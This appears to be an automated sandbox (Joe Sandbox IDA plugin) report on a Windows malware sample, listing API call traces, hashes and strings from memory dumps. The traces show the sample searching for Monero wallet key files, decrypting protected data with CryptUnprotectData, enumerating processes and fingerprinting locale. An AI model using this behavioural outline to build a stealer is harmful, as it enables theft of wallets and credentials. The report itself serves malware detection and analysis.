                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                  • String ID: \*.*
                  • API String ID: 2325840235-1173974218
                  • Opcode ID: 74b8be297dfaa232f4914552eea390590d3d08478f983b709243fe215cef9ed2
                  • Instruction ID: 82f16b95504cd89654d64577e8b493f15f8beb8abcb6976ed1e4cc870d20941e
                  • Opcode Fuzzy Hash: 74b8be297dfaa232f4914552eea390590d3d08478f983b709243fe215cef9ed2
                  • Instruction Fuzzy Hash: D0F1BF71814118AADB19FB60DC96FEE7378BF94300F8041D9B54A62091EF346F8ACF66
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009414B0,00940C2A), ref: 0092DAEB
                  • StrCmpCA.SHLWAPI(?,009414B4), ref: 0092DB33
                  • StrCmpCA.SHLWAPI(?,009414B8), ref: 0092DB49
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0092DDCC
                  • FindClose.KERNEL32(000000FF), ref: 0092DDDE
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                   • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: c345f06d72d5a3566fa5e8fed77a98ff7d2c03132b723ef18d118ac5ef5bde7d
                  • Instruction ID: 0878d2f5e8656eceb84d17d753cc1d4aa87e004d51fe68e2a5b59f8a4347485c
                  • Opcode Fuzzy Hash: c345f06d72d5a3566fa5e8fed77a98ff7d2c03132b723ef18d118ac5ef5bde7d
                  • Instruction Fuzzy Hash: 67912172900114ABCB14FB70EC96EED737DAFD4300F408668F94A96195EE34AB598F93
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                   • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Zz$%.>i$&Nw[$/vO$3,6$@?_}$c@YR$,}>
                  • API String ID: 0-4019879789
                  • Opcode ID: d0a7e110e0bfca6ef5afc8f37cfe6bbc894ce311795e4aa91b742b7d690e0fe5
                  • Instruction ID: 8da7a39af3c44122696512f7de76b33c306c27dec5ae562365cf606cfe5b96e3
                  • Opcode Fuzzy Hash: d0a7e110e0bfca6ef5afc8f37cfe6bbc894ce311795e4aa91b742b7d690e0fe5
                  • Instruction Fuzzy Hash: 47B247F360C2049FE3046E2DEC8567AFBE9EFD4620F1A4A3DEAC4C3744E97558058696
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                  • GetKeyboardLayoutList.USER32(00000000,00000000,009405AF), ref: 00937BE1
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00937BF9
                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00937C0D
                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00937C62
                  • LocalFree.KERNEL32(00000000), ref: 00937D22
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                   • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                  • String ID: /
                  • API String ID: 3090951853-4001269591
                  • Opcode ID: c48b78818de65fa11cf3b6020a218571619bf85ea1022db42761ba55bc5908fe
                  • Instruction ID: 136a7c5290e3a6aa55efefcb7383c94035a0d01840497ec1d0c5d2251a1431fc
                  • Opcode Fuzzy Hash: c48b78818de65fa11cf3b6020a218571619bf85ea1022db42761ba55bc5908fe
                  • Instruction Fuzzy Hash: 3F413D71940218ABDB24DB94DC99BEEB3B8FF84700F204199E10A73291DB742F85CFA1
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00940D73), ref: 0092E4A2
                  • StrCmpCA.SHLWAPI(?,009414F8), ref: 0092E4F2
                  • StrCmpCA.SHLWAPI(?,009414FC), ref: 0092E508
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0092EBDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                   • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 433455689-1173974218
                  • Opcode ID: 854a819ac2e9d551864334711c0a926e2bb35c97d0152d4cf296e5f74f78a00e
                  • Instruction ID: 1244e1c1788193dc33612e871342a215e259dbd4d405b81fb740f6b0ce540fbd
                  • Opcode Fuzzy Hash: 854a819ac2e9d551864334711c0a926e2bb35c97d0152d4cf296e5f74f78a00e
                  • Instruction Fuzzy Hash: 37123172910118ABDB18FB60DC96FEE7378AFD4300F4045A9B54AA6191EF346F49CF92
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                   • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: %-g$34g6$V_vn$ksu$|ey?$~-36
                  • API String ID: 0-3917117089
                  • Opcode ID: 683db20287f2a1ff4465d71e7641caa5be54898a0e2eaeeaad9ae7571c069ae4
                  • Instruction ID: bf6166820bf5065a41692e20e04336b003383f6b96b378b47f6590cd5feb32ee
                  • Opcode Fuzzy Hash: 683db20287f2a1ff4465d71e7641caa5be54898a0e2eaeeaad9ae7571c069ae4
                  • Instruction Fuzzy Hash: 7DB215F390C2049FE7046F29EC8567AFBE9EF94720F1A493DEAC583344EA3558458687
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                   • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 2|=$JtZ$M%H$jwl*$r+Ky
                  • API String ID: 0-660362512
                  • Opcode ID: a05c92b1f288b0f72a4d0add8e036c58558a5146d16af8ab432a314936ecd58d
                  • Instruction ID: f7dc3485f3e42bfbe51a4598c8a8c7189c7548c7a84f1f9367bc588bd74e06ee
                  • Opcode Fuzzy Hash: a05c92b1f288b0f72a4d0add8e036c58558a5146d16af8ab432a314936ecd58d
                  • Instruction Fuzzy Hash: 5BB277F3A0C2049FE3046E2DEC8567ABBE9EF94720F1A453DEAC4C3744EA7558058697
                  APIs
                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0092C871
                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0092C87C
                  • lstrcat.KERNEL32(?,00940B46), ref: 0092C943
                  • lstrcat.KERNEL32(?,00940B47), ref: 0092C957
                  • lstrcat.KERNEL32(?,00940B4E), ref: 0092C978
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                   • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$BinaryCryptStringlstrlen
                  • String ID:
                  • API String ID: 189259977-0
                  • Opcode ID: 23abf8d079fcce78f1c66bf966b3eb96621931463ceef271a5d9bf85896ab7b3
                  • Instruction ID: b0dfa600a8ac42ec28a6f068ee887ab66140bbf6c6525e5ab83736cdb78aeed8
                  • Opcode Fuzzy Hash: 23abf8d079fcce78f1c66bf966b3eb96621931463ceef271a5d9bf85896ab7b3
                  • Instruction Fuzzy Hash: 014141B990421ADBCF10DFA4DD89BFEB7B8BB44704F1045A8E509A72C0DB755A84CF91
                  APIs
                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0092724D
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00927254
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00927281
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 009272A4
                  • LocalFree.KERNEL32(?), ref: 009272AE
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                  • String ID:
                  • API String ID: 2609814428-0
                  • Opcode ID: c3ce5e13dbd9c4fc09936991601a3094dc3c465b1d71001aaca5cc44e32a1ba1
                  • Instruction ID: 3cc454083f55dbe8d7fddb08246807f7b6c6e840f0646f9085a3aa1aed3bab2c
                  • Opcode Fuzzy Hash: c3ce5e13dbd9c4fc09936991601a3094dc3c465b1d71001aaca5cc44e32a1ba1
                  • Instruction Fuzzy Hash: 1E011275A40308BBDB10DFD4DD45F9D77B8EB44704F104558FB05BB2C0DAB4AA008B65
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0093961E
                  • Process32First.KERNEL32(00940ACA,00000128), ref: 00939632
                  • Process32Next.KERNEL32(00940ACA,00000128), ref: 00939647
                  • StrCmpCA.SHLWAPI(?,00000000), ref: 0093965C
                  • CloseHandle.KERNEL32(00940ACA), ref: 0093967A
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                  • String ID:
                  • API String ID: 420147892-0
                  • Opcode ID: bdda154954ad97c0a0295bb97afa6ec6fb01f2c71af1916eef0b1e9c1531ab95
                  • Instruction ID: 211be6c817ed013fda3e7edffaddda7042ef8497ea3537e3fa8cf08b80e6eead
                  • Opcode Fuzzy Hash: bdda154954ad97c0a0295bb97afa6ec6fb01f2c71af1916eef0b1e9c1531ab95
                  • Instruction Fuzzy Hash: 03010C75A01208ABCF14DFA5CD99BEDB7F8EB48304F104188E909A7290DBB8AF40DF51
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 0k$_$w_$e^^$}\=o$m{m
                  • API String ID: 0-3038091240
                  • Opcode ID: 78441b5d05dcf85b942691049d0df88c9f7abf123d459e7b5f2d90e4a00bbf46
                  • Instruction ID: f8d7dc368a922e72dd2bed287c8c54b064d6f80a24fa9de551af5f3dd8295aff
                  • Opcode Fuzzy Hash: 78441b5d05dcf85b942691049d0df88c9f7abf123d459e7b5f2d90e4a00bbf46
                  • Instruction Fuzzy Hash: A282D6F3A08204AFE3146E2DEC8577AFBE9EF94760F16493DE6C483744E63558048697
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: <E_$\I~k$tB;r$~W
                  • API String ID: 0-3662467418
                  • Opcode ID: 6d2c3baf2c5a61bdd1c4c486394a6583085dba1082155fa1203ada94b9e0231a
                  • Instruction ID: 08096f7b96796058cc4ddef12bfb77240a08519c4eec730c2fb7f125de015a18
                  • Opcode Fuzzy Hash: 6d2c3baf2c5a61bdd1c4c486394a6583085dba1082155fa1203ada94b9e0231a
                  • Instruction Fuzzy Hash: 71B2E7F3A082009FE304AE2DEC8577ABBE5EF94720F1A493DEAC4C7744E63558158697
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,009405B7), ref: 009386CA
                  • Process32First.KERNEL32(?,00000128), ref: 009386DE
                  • Process32Next.KERNEL32(?,00000128), ref: 009386F3
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                  • CloseHandle.KERNEL32(?), ref: 00938761
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                  • String ID:
                  • API String ID: 1066202413-0
                  • Opcode ID: 93cca1786e3d8782148aebd74c733bd76ed6f7ce522cd54b00ef082601312851
                  • Instruction ID: 9731a1bb8338f3673f9fcd833c87b638c8915252d79707b5937d07826f51fd2c
                  • Opcode Fuzzy Hash: 93cca1786e3d8782148aebd74c733bd76ed6f7ce522cd54b00ef082601312851
                  • Instruction Fuzzy Hash: 08314871901218ABCB24EF54DC95FEEB7B8EB85700F104199F10AB21A0DF746E45CFA2
                  APIs
                  • CryptBinaryToStringA.CRYPT32(00000000,00925184,40000001,00000000,00000000,?,00925184), ref: 00938EC0
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptString
                  • String ID:
                  • API String ID: 80407269-0
                  • Opcode ID: 39bb69c7bbc397994ad1aafd71895466e35c5cd5b44384d44e9f2ec621e2e602
                  • Instruction ID: 80bf59081b8d17a787c4ceb2f882bfcb871693ae446efc73ebb614194d214e82
                  • Opcode Fuzzy Hash: 39bb69c7bbc397994ad1aafd71895466e35c5cd5b44384d44e9f2ec621e2e602
                  • Instruction Fuzzy Hash: 8011D674200309BFDF00DF64D885FAB37A9AF89714F109958F9198B250DB79E941DFA1
                  APIs
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00924EEE,00000000,00000000), ref: 00929AEF
                  • LocalAlloc.KERNEL32(00000040,?,?,?,00924EEE,00000000,?), ref: 00929B01
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00924EEE,00000000,00000000), ref: 00929B2A
                  • LocalFree.KERNEL32(?,?,?,?,00924EEE,00000000,?), ref: 00929B3F
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptLocalString$AllocFree
                  • String ID:
                  • API String ID: 4291131564-0
                  • Opcode ID: 4cf49d0f2dfa1925f0e4515c611895390a5de99a06f6ef309a31c2c86b46a27f
                  • Instruction ID: 658c73cf56a563b059231f309f4c0fdce8f91ef006132c394cbf7e7b2cc4816b
                  • Opcode Fuzzy Hash: 4cf49d0f2dfa1925f0e4515c611895390a5de99a06f6ef309a31c2c86b46a27f
                  • Instruction Fuzzy Hash: 4E11A4B4240208AFEB10CF64DC95FAA77B9FB89700F208058F9159B3D4C7B5A901DB90
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00940E00,00000000,?), ref: 009379B0
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009379B7
                  • GetLocalTime.KERNEL32(?,?,?,?,?,00940E00,00000000,?), ref: 009379C4
                  • wsprintfA.USER32 ref: 009379F3
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                  • String ID:
                  • API String ID: 377395780-0
                  • Opcode ID: bc88e795b2d6a2e3360ab8652c2fa35aebd207e6b4ce16715515a0ec90cead00
                  • Instruction ID: 0a72bd6f87059165859a2f80ee4ac132ba533e38eb10f3fd2553ed7497f46e9b
                  • Opcode Fuzzy Hash: bc88e795b2d6a2e3360ab8652c2fa35aebd207e6b4ce16715515a0ec90cead00
                  • Instruction Fuzzy Hash: C811E5B2904118AACB149FD9DD45BBEB7F8EB48B11F10465AF605A3280E67D5940CBB1
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0105E120,00000000,?,00940E10,00000000,?,00000000,00000000), ref: 00937A63
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00937A6A
                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0105E120,00000000,?,00940E10,00000000,?,00000000,00000000,?), ref: 00937A7D
                  • wsprintfA.USER32 ref: 00937AB7
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                  • String ID:
                  • API String ID: 3317088062-0
                  • Opcode ID: 30ea3a2706d5503f9e132b575568fd20b66b2d295e6c42ee24a7ff96f7667678
                  • Instruction ID: d6e4e4cee07cedebf12a2f9b65477bf913c94cdb4d58d286f9421cb6b5b26417
                  • Opcode Fuzzy Hash: 30ea3a2706d5503f9e132b575568fd20b66b2d295e6c42ee24a7ff96f7667678
                  • Instruction Fuzzy Hash: F5115EB1945218EBEB208B94DC49FA9FB78FB44721F10479AE91AA32C0DB785E40CF51
                  APIs
                  • CoCreateInstance.COMBASE(0093E118,00000000,00000001,0093E108,00000000), ref: 00933758
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 009337B0
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: ByteCharCreateInstanceMultiWide
